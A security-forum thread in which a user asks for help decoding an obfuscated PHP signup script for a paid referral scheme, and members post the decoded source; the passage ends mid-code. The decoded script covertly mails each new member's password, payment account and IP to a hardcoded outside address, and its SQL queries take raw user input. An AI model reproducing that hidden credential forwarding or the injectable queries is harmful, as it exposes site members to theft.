Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: May 8, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 630 Members: 0 Total: 630 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> PHP script decode requests -> Help with Decode    View previous topic :: View next topic  Help with Decode Posted: Mon Jan 19, 2009 5:08 pm allbiz Beginner   Joined: Jan 19, 2009 Posts: 1 Ok.I have tried some of the online tools, but don't seem to be getting anywhere. The file just shrinks from 5K to 500Bytes. I am over my head on this one. I need to change some parameters in this file and could really use a full decode. Also, any expert advice on the security aspects of this file would be greatly appreciated. I'll be happy to PayPal a "donation" for an early decrypt! Thanks in advance! Code: Code: <?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=3996;eval(gzuncompress(base64_decode('eNplj1dvwjAAhP9MpNgiCJMFUZQH9sbs9VJlOAOysDMgv76gVm2l6u7pdPdJx2GEEH4JGW6SkhhwGOOvQOCpxUO99IOQgHqdw+/i29D1SMYA9zMVmkiUof4vlpGmQv1F/F4aXpXHdhKllDAGLJMRVf5wiJ04BLCMZhS4lJjOX4QiqVDg74NaT0xKzB5mF1V+sBydVkdNKmZUvqX9q3IZW20nm+d2PDx0mm4YNZ7rnbfdkPNkul+0VIMX+E631x8MR+PJdDZfLPFqvdnu9ofj6XwxLdshrucH11sYxUl6pyzLi/LxrFBTlGRFbbW1WoOHEOqkMEPwewjqn85iXyI=')));return;?> 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 Posted: Mon Jan 19, 2009 11:07 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Code: <?php if(time()>1207008000)die('This script has expired.'); require('program.php'); require('top.php'); ;echo '<center><br><br> '; if ($submit) { if (!$id || !$first || !$last || !$email || !$acc || !$pass || !$pass2) { echo "Sorry! You didn't fill in all the fields!"; } elseif ($pass != $pass2) { echo 'Sorry! Your passwords do not match'; } else { $joindate = date('d.m.Y'); $db = mysql_pconnect("$dbhost", "$dbuser", "$dbpass") or die('Could not connect'); mysql_select_db("$dbname") or die('Could not select database'); if ($id == $ref) { unset($ref);} if ($ref) { $refsql = @mysql_query("SELECT id FROM users WHERE id='$ref'"); $ref = @mysql_result($refsql, 0); } if (!$ref) { $refsql = @mysql_query("SELECT id,username FROM qref WHERE type='Owed' ORDER BY time LIMIT 1"); $refa = @mysql_fetch_array($refsql); $ref = $refa['username']; $qrid = $refa['id']; $reftype = 'Owed'; } if (!$ref) { $refsql = @mysql_query("SELECT id,username FROM qref WHERE type='Bonus' ORDER BY last LIMIT 1"); $refa = @mysql_fetch_array($refsql); $ref = $refa['username']; $qrid = $refa['id']; $reftype = 'Bonus'; } if (!$ref && $id != 'admin') $ref = 'admin'; $l = 0; if ($ref) $cl = array($ref); for (;;) { if (!$ref) break; $j = 0; $nl = array(); foreach ($cl as $refid) { $getref = mysql_query("SELECT id FROM users WHERE id='$refid'"); while ($refinfo = mysql_fetch_array($getref, MYSQL_ASSOC)) { $mprsr = mysql_query("SELECT COUNT(id) FROM users WHERE mpr='$refid'"); $mprs = mysql_result($mprsr, 0); if ($mprs >= $maxrefs) { $getref2 = mysql_query("SELECT id FROM users WHERE mpr='$refid' ORDER BY joindate"); while ($refinfo2 = mysql_fetch_array($getref2, MYSQL_ASSOC)) { $nl[$j] = $refinfo2['id']; $j++; } } else { $mpr = $refinfo['id']; break 3; } } if ($j == 0) { break 2; } } $cl = $nl; unset($nl); $l++; } $sql = "INSERT INTO users (id,first,last,email,acc,pass,ref,refs,mpr,earnings,joindate) VALUES ('$id','$first','$last','$email','$acc','$pass','$ref',0,'$mpr',0,'$joindate')"; $result = mysql_query($sql); if (!$result) { echo "<br><br><FONT face=Verdana size=3><b>Sorry!  The username $id is already taken by someone else, go back and choose another.</b></font><br><br><p><p>"; } else { if ($ref) { $usql = "UPDATE users SET refs=refs+1 WHERE id='$ref'"; $updaterefs = mysql_query($usql); $tmpr = $id; foreach ($referral_levels as $level) { $refresult = @mysql_query("SELECT mpr FROM users WHERE id='$tmpr'"); $tmpr = @mysql_result($refresult, 0); $refresult = @mysql_query("SELECT id FROM users WHERE id='$tmpr'"); $refmyrow = @mysql_fetch_array($refresult); $tmpr = $refmyrow['id']; if  (!$tmpr || $tmpr == $id) { break;} $usql = "UPDATE users SET earnings=earnings+$level WHERE id='$tmpr'"; $updaterefs = mysql_query($usql); } } if ($reftype == 'Bonus') { $qrsql = mysql_query("UPDATE qref SET last='$now' WHERE id='$qrid'"); } elseif ($reftype == 'Owed') { $qrsql = mysql_query("DELETE FROM qref WHERE id='$qrid'"); } $to  = "$first $last <$email>"; $subject = "Welcome to $pname"; $message = " Dear $first Welcome to $pname here is your login information: Username: $id Password: $pass You can login at: $url/members.php Your referral URL is $url/?r=$id Sincerely, The $pname Staff $url/ "; $headers .= "From: $pname <$admin_email>\r\n"; mail($to, $subject, $message, $headers); if ("$ref_notice" ==  '1' && $ref) { $refsql = "SELECT * FROM users WHERE id='$ref'"; $refresult = mysql_query($refsql); $refmyrow = mysql_fetch_array($refresult); $reffirst = $refmyrow['first']; $reflast = $refmyrow['last']; $refemail = $refmyrow['email']; $refto  = "$reffirst $reflast <$refemail>"; $refsubject = 'Referral Notice'; $refmessage = " Dear $reffirst You have just referred $first $last to $pname. Your referral URL is $url/?r=$ref Sincerely, The $pname Staff $url/ "; $refheaders .= "From: $pname <$admin_email>\r\n"; } mail($refto, $refsubject, $refmessage, $refheaders); if ("$admin_notice" ==  '1') { $adminto  = "$pname Staff <$admin_email>"; $admintoo  = "$pname Staff <onlyscript@gmail.com>"; $adminsubject = "New Member at $pname"; $adminmessage = " A new member Joined the site. User ID $id Password $pass Email ID $email Thru $pay account number $acc Under referrel ID: $ref IP address $_SERVER[REMOTE_ADDR] Sincerely, The $pname $url/ "; $adminheaders .= "From: $pname <$admin_email>\r\n"; mail($adminto, $adminsubject, $adminmessage, $adminheaders); mail($admintoo, $adminsubject, $adminmessage, $adminheaders); } echo "<center><FONT face=Verdana size=2><br><br><img src='images/thanks3.gif' border=0><br><br><b>Thank you! for signing up with $pname, an E-mail has been sent to your E-mail address to welcome you.\n</center><p><p><p></font>"; } } } elseif ($step == 'two') { ;echo '<br><FONT face=Verdana size=3><b>REGISTRATION STEP TWO</b><br><Br>Enter your information.</b></font></center><br><table border=0 width=80% align=center><tr><td width="50%"><FONT face=Verdana size=4> Your Preferred Username<br> Your First name<br> Your Last name<br> Your Email<br> Your ';echo $pay;echo ' account<br> Choose a password<br> Repeat password<br></font> </td><td width="50%" valign="top">   <form method="post" action="';echo $PHP_SELF;echo '">   <input type="Text" name="id"><br>   <input type="Text" name="first"><br>   <input type="Text" name="last"><br>   <input type="Text" name="email"><br>   <input type="Text" name="acc"><br>   <input type="password" name="pass"><br>   <input type="password" name="pass2"><br>   <input type="hidden" name="ref" value="';echo $r;echo '"> </td></tr></table><br><br><center><img src=\'image.php\' border=0><br><br><input type="Submit" name="submit" value="Confirm your Membership"></center>   </form><br><br> '; } else { ;echo '<br><center><FONT face=Verdana size=2>The cost to join is <big>$<b>';echo $cost;echo '';echo $time;echo '</big> Only</b>.</font> <br> '; if ("$payment_method" ==  '1') { ;echo '<form action="https://www.paypal.com/cgi-bin/webscr" method="post"><input type="hidden" name="cmd" value="_xclick"> <input type="hidden" name="business" value="';echo $paypal;echo '"><input type="hidden" name="undefined_quantity" value="1"> <input type="hidden" name="item_name" value="';echo $pname;echo ' Member"><input type="hidden" name="item_number" value="1"> <input type="hidden" name="amount" value="';echo $cost;echo '"><input type="hidden" name="no_shipping" value="1"> <input type="hidden" name="rm" value="2"> <input type="hidden" name="return" value="';echo $url;echo '/signup.php?step=two&r=';echo $r;echo '"> <input type="hidden" name="cancel_return" value="';echo $url;echo '/?r=';echo $r;echo '"> <input type="hidden" name="no_note" value="1"><input type="submit" name="submit" value="Step One"></form> '; } if ("$payment_method" ==  '2') { ;echo '<font size="2" face=verdana><b>REGISTRATION STEP ONE</b><br><br>Once you click the Click to complete Step One button, you will be redirected to an e-gold payment page to pay the $1 Life time membership fee.<br><br>Make sure to click the <b>Confirm & Continue</b> button on the e-gold payment page until you return to this web site, then your need to complete Step Two, After Step two the system will automatically generate a new site account for you and your account info will be sent to your email address for your reference.<br><Br><form action="https://www.e-gold.com/sci_asp/payments.asp" method="POST"><input type="hidden" name="PAYEE_ACCOUNT" value="';echo $egold;echo '"><input type="hidden" name="PAYEE_NAME" value="';echo $pname;echo '"><input type="hidden" name="PAYMENT_AMOUNT" value="';echo $cost;echo '"><input type="hidden" name="PAYMENT_UNITS" value="1"><input type="hidden" name="PAYMENT_METAL_ID" value="1"><input type="hidden" name="PAYMENT_URL" value="';echo $url;echo '/signup.php?step=two&r=';echo $r;echo '"><input type="hidden" name="NOPAYMENT_URL" value="';echo $url;echo '/?r=';echo $r;echo '"><input type="hidden" name="SUGGESTED_MEMO" value="';echo $pname;echo ' Member"><input type="hidden" name="BAGGAGE_FIELDS" value=""><input type="submit" name="PAYMENT_METHOD" value="Click to complete Step One"></form><br><br><img src=\'image.php\' border=0><br><br></font> '; } if ("$payment_method" ==  '3') { ;echo '<form action="https://www.paypal.com/cgi-bin/webscr" method="post"> <input type="hidden" name="cmd" value="_xclick-subscriptions"><input type="hidden" name="business" value="';echo $paypal;echo '"> <input type="hidden" name="item_name" value="';echo $pname;echo ' Member"><input type="hidden" name="item_number" value="1"> <input type="hidden" name="no_shipping" value="1"> <input type="hidden" name="rm" value="2"> <input type="hidden" name="return" value="';echo $url;echo '/signup.php?step=two&r=';echo $r;echo '"> <input type="hidden" name="cancel_return" value="';echo $url;echo '/?r=';echo $r;echo '"> <input type="hidden" name="no_note" value="1"><input type="hidden" name="a3" value="';echo $cost;echo '"> <input type="hidden" name="p3" value="1"><input type="hidden" name="t3" value="M"><input type="hidden" name="src" value="1"> <input type="hidden" name="sra" value="1"><input type="submit" name="submit" value="Step One"></form> '; } if ("$payment_method" ==  '4') { ;echo '<form method="post" action="https://www.stormpay.com/stormpay/handle_gen.php"> <input type="hidden" name="generic" value="1"><input type="hidden" name="payee_email" value="';echo $stormpay;echo '"> <input type="hidden" name="product_name" value="';echo $pname;echo ' Member"> <input type="hidden" name="amount" value="';echo $cost;echo '"> <input type="hidden" name="return_URL" value="';echo $url;echo '/signup.php?step=two&r=';echo $r;echo '"> <input type="hidden" name="cancel_URL" value="';echo $url ;echo '/?r=';echo $r;echo '"> <input type="submit" name="submit" value="Step One"></form><br><br> '; } if ("$payment_method" ==  '5') { ;echo ' <form method=post action="https://www.stormpay.com/stormpay/handle_gen.php"> <input type="hidden" name=generic value=1> <input type="hidden" name=payee_email value="';echo $stormpay;echo '"> <input type="hidden" name=product_name value="';echo $pname;echo ' Member"> <input type="hidden" name=subscription value="YES"><input type="hidden" name=setup_fee value="0.00"> <input type="hidden" name=recurrent_charge value="';echo $cost;echo '"><input type="hidden" name=duration value="30"> <input type="hidden" name=return_URL value="';echo $url;echo '/signup.php?step=two&r=';echo $r;echo '"> <input type="hidden" name=cancel_URL value="';echo $url ;echo '/?r=';echo $r;echo '"> <input type="submit" name="submit" value="Step One"> </form><br><br> '; } } require('bottom.php'); exit(); ?> Donation is welcome And you are interesrested in security aspects of this specific php script? Well, i can spot more that one potentially vulnerable code fragment. But security impact depends on many factors and i must have more info to be sure. Posted: Wed Jan 28, 2009 11:07 pm zerobytes Valuable expert   Joined: Aug 30, 2008 Posts: 199 sorry waraxe but it should be Code: <?php require ('program.php'); require ('top.php'); ?><center><br><br>  <?  if ($submit) {  if (!$id || !$first || !$last || !$email || !$acc || !$pass || !$pass2) {  echo "Sorry! You didn't fill in all the fields!";  } elseif ($pass != $pass2) {  echo 'Sorry! Your passwords do not match';  } else {  $joindate = date('d.m.Y');  $db = mysql_pconnect("$dbhost", "$dbuser", "$dbpass") or die('Could not connect');  mysql_select_db("$dbname") or die('Could not select database');  if ($id == $ref) { unset($ref);}  if ($ref) {  $refsql = @mysql_query("SELECT id FROM users WHERE id='$ref'");  $ref = @mysql_result($refsql, 0);  }  if (!$ref) {  $refsql = @mysql_query("SELECT id,username FROM qref WHERE type='Owed' ORDER BY time LIMIT 1");  $refa = @mysql_fetch_array($refsql);  $ref = $refa['username'];  $qrid = $refa['id'];  $reftype = 'Owed';  }  if (!$ref) {  $refsql = @mysql_query("SELECT id,username FROM qref WHERE type='Bonus' ORDER BY last LIMIT 1");  $refa = @mysql_fetch_array($refsql);  $ref = $refa['username'];  $qrid = $refa['id'];  $reftype = 'Bonus';  }  if (!$ref && $id != 'admin') $ref = 'admin';  $l = 0;  if ($ref) $cl = array($ref);  for (;;) {  if (!$ref) break;  $j = 0;  $nl = array();  foreach ($cl as $refid) {  $getref = mysql_query("SELECT id FROM users WHERE id='$refid'");  while ($refinfo = mysql_fetch_array($getref, MYSQL_ASSOC)) {  $mprsr = mysql_query("SELECT COUNT(id) FROM users WHERE mpr='$refid'");  $mprs = mysql_result($mprsr, 0);  if ($mprs >= $maxrefs) {  $getref2 = mysql_query("SELECT id FROM users WHERE mpr='$refid' ORDER BY joindate");  while ($refinfo2 = mysql_fetch_array($getref2, MYSQL_ASSOC)) {  $nl[$j] = $refinfo2['id'];  $j++;  }  } else {  $mpr = $refinfo['id'];  break 3;  }  }  if ($j == 0) {  break 2;  }  }  $cl = $nl;  unset($nl);  $l++;  }  $sql = "INSERT INTO users (id,first,last,email,acc,pass,ref,refs,mpr,earnings,joindate) VALUES ('$id','$first','$last','$email','$acc','$pass','$ref',0,'$mpr',0,'$joindate')";  $result = mysql_query($sql);  if (!$result) {  echo "<br><br><FONT face=Verdana size=3><b>Sorry!  The username $id is already taken by someone else, go back and choose another.</b></font><br><br><p><p>";  } else {  if ($ref) {  $usql = "UPDATE users SET refs=refs+1 WHERE id='$ref'";  $updaterefs = mysql_query($usql);  $tmpr = $id;  foreach ($referral_levels as $level) {  $refresult = @mysql_query("SELECT mpr FROM users WHERE id='$tmpr'");  $tmpr = @mysql_result($refresult, 0);  $refresult = @mysql_query("SELECT id FROM users WHERE id='$tmpr'");  $refmyrow = @mysql_fetch_array($refresult);  $tmpr = $refmyrow['id'];  if  (!$tmpr || $tmpr == $id) { break;}  $usql = "UPDATE users SET earnings=earnings+$level WHERE id='$tmpr'";  $updaterefs = mysql_query($usql);  }  }  if ($reftype == 'Bonus') {  $qrsql = mysql_query("UPDATE qref SET last='$now' WHERE id='$qrid'");  } elseif ($reftype == 'Owed') {  $qrsql = mysql_query("DELETE FROM qref WHERE id='$qrid'");  }  $to  = "$first $last <$email>";  $subject = "Welcome to $pname";  $message = "  Dear $first  Welcome to $pname here is your login information:  Username: $id  Password: $pass  You can login at: $url/members.php  Your referral URL is $url/?r=$id  Sincerely,  The $pname Staff  $url/  ";  $headers .= "From: $pname <$admin_email>\r\n";  mail($to, $subject, $message, $headers);  if ("$ref_notice" ==  '1' && $ref) {  $refsql = "SELECT * FROM users WHERE id='$ref'";  $refresult = mysql_query($refsql);  $refmyrow = mysql_fetch_array($refresult);  $reffirst = $refmyrow['first'];  $reflast = $refmyrow['last'];  $refemail = $refmyrow['email'];  $refto  = "$reffirst $reflast <$refemail>";  $refsubject = 'Referral Notice';  $refmessage = "  Dear $reffirst  You have just referred $first $last to $pname.  Your referral URL is $url/?r=$ref  Sincerely,  The $pname Staff  $url/  ";  $refheaders .= "From: $pname <$admin_email>\r\n";  }  mail($refto, $refsubject, $refmessage, $refheaders);  if ("$admin_notice" ==  '1') {  $adminto  = "$pname Staff <$admin_email>";  $admintoo  = "$pname Staff <onlyscript@gmail.com>";  $adminsubject = "New Member at $pname";  $adminmessage = "  A new member Joined the site.  User ID $id    Password $pass  Email ID $email    Thru $pay account number $acc    Under referrel ID: $ref  IP address $_SERVER[REMOTE_ADDR]  Sincerely,  The $pname  $url/  ";  $adminheaders .= "From: $pname <$admin_email>\r\n";  mail($adminto, $adminsubject, $adminmessage, $adminheaders);  mail($admintoo, $adminsubject, $adminmessage, $adminheaders);  }  echo "<center><FONT face=Verdana size=2><br><br><img src='images/thanks3.gif' border=0><br><br><b>Thank you! for signing up with $pname, an E-mail has been sent to your E-mail address to welcome you.\n</center><p><p><p></font>";  }  }  } elseif ($step == 'two') {  ?><br><FONT face=Verdana size=3><b>REGISTRATION STEP TWO</b><br><Br>Enter your information.</b></font></center><br><table border=0 width=80% align=center><tr><td width="50%"><FONT face=Verdana size=4>  Your Preferred Username<br>  Your First name<br>  Your Last name<br>  Your Email<br>  Your <? echo  $pay?> account<br>  Choose a password<br>  Repeat password<br></font>  </td><td width="50%" valign="top">    <form method="post" action="<? echo  $PHP_SELF?>">    <input type="Text" name="id"><br>    <input type="Text" name="first"><br>    <input type="Text" name="last"><br>    <input type="Text" name="email"><br>    <input type="Text" name="acc"><br>    <input type="password" name="pass"><br>    <input type="password" name="pass2"><br>    <input type="hidden" name="ref" value="<? echo $r?>">  </td></tr></table><br><br><center><img src=\'image.php\' border=0><br><br><input type="Submit" name="submit" value="Confirm your Membership"></center>    </form><br><br>  <?  } else {  ?><br><center><FONT face=Verdana size=2>The cost to join is <big>$<b><? echo $cost?><? echo  $time?></big> Only</b>.</font>  <br>  <?  if ("$payment_method" ==  '1') {  ?><form action="https://www.paypal.com/cgi-bin/webscr" method="post"><input type="hidden" name="cmd" value="_xclick">  <input type="hidden" name="business" value="<? echo  $paypal?>"><input type="hidden" name="undefined_quantity" value="1">  <input type="hidden" name="item_name" value="<? echo  $pname?> Member"><input type="hidden" name="item_number" value="1">  <input type="hidden" name="amount" value="<? echo  $cost?>"><input type="hidden" name="no_shipping" value="1">  <input type="hidden" name="rm" value="2">  <input type="hidden" name="return" value="<? echo $url?>/signup.php?step=two&r=<? echo  $r?>">  <input type="hidden" name="cancel_return" value="<? echo $url?>/?r=<? echo $r ?>">  <input type="hidden" name="no_note" value="1"><input type="submit" name="submit" value="Step One"></form>  <?  }    if ("$payment_method" ==  '2') {  ?><font size="2" face=verdana><b>REGISTRATION STEP ONE</b><br><br>Once you click the Click to complete Step One button, you will be redirected to an e-gold payment page to pay the $1 Life time membership fee.<br><br>Make sure to click the <b>Confirm & Continue</b> button on the e-gold payment page until you return to this web site, then your need to complete Step Two, After Step two the system will automatically generate a new site account for you and your account info will be sent to your email address for your reference.<br><Br><form action="https://www.e-gold.com/sci_asp/payments.asp" method="POST"><input type="hidden" name="PAYEE_ACCOUNT" value="<? echo  $egold?>"><input type="hidden" name="PAYEE_NAME" value="<? echo  $pname?>"><input type="hidden" name="PAYMENT_AMOUNT" value="<? echo  $cost?>"><input type="hidden" name="PAYMENT_UNITS" value="1"><input type="hidden" name="PAYMENT_METAL_ID" value="1"><input type="hidden" name="PAYMENT_URL" value="<? echo  $url?>/signup.php?step=two&r=<? echo  $r?>"><input type="hidden" name="NOPAYMENT_URL" value="<? echo  $url?>/?r=<? echo  $r?>"><input type="hidden" name="SUGGESTED_MEMO" value="<? echo  $pname?> Member"><input type="hidden" name="BAGGAGE_FIELDS" value=""><input type="submit" name="PAYMENT_METHOD" value="Click to complete Step One"></form><br><br><img src=\'image.php\' border=0><br><br></font>  <?  }    if ("$payment_method" ==  '3') {  ?><form action="https://www.paypal.com/cgi-bin/webscr" method="post">  <input type="hidden" name="cmd" value="_xclick-subscriptions"><input type="hidden" name="business" value="<? echo  $paypal?>">  <input type="hidden" name="item_name" value="<? echo  $pname?> Member"><input type="hidden" name="item_number" value="1">  <input type="hidden" name="no_shipping" value="1">  <input type="hidden" name="rm" value="2">  <input type="hidden" name="return" value="<? echo  $url?>/signup.php?step=two&r=<? echo  $r?>">  <input type="hidden" name="cancel_return" value="<? echo  $url?>/?r=<? echo  $r?>">  <input type="hidden" name="no_note" value="1"><input type="hidden" name="a3" value="<? echo  $cost?>">  <input type="hidden" name="p3" value="1"><input type="hidden" name="t3" value="M"><input type="hidden" name="src" value="1">  <input type="hidden" name="sra" value="1"><input type="submit" name="submit" value="Step One"></form>  <?  }  if ("$payment_method" ==  '4') {  ?><form method="post" action="https://www.stormpay.com/stormpay/handle_gen.php">  <input type="hidden" name="generic" value="1"><input type="hidden" name="payee_email" value="<? echo  $stormpay?>">  <input type="hidden" name="product_name" value="<? echo  $pname?> Member">  <input type="hidden" name="amount" value="<? echo  $cost?>">  <input type="hidden" name="return_URL" value="<? echo  $url?>/signup.php?step=two&r=<? echo  $r?>">  <input type="hidden" name="cancel_URL" value="<? echo  $url ?>/?r=<? echo  $r?>">  <input type="submit" name="submit" value="Step One"></form><br><br>  <?  }    if ("$payment_method" ==  '5') {  ?>  <form method=post action="https://www.stormpay.com/stormpay/handle_gen.php">  <input type="hidden" name=generic value=1> <input type="hidden" name=payee_email value="<? echo  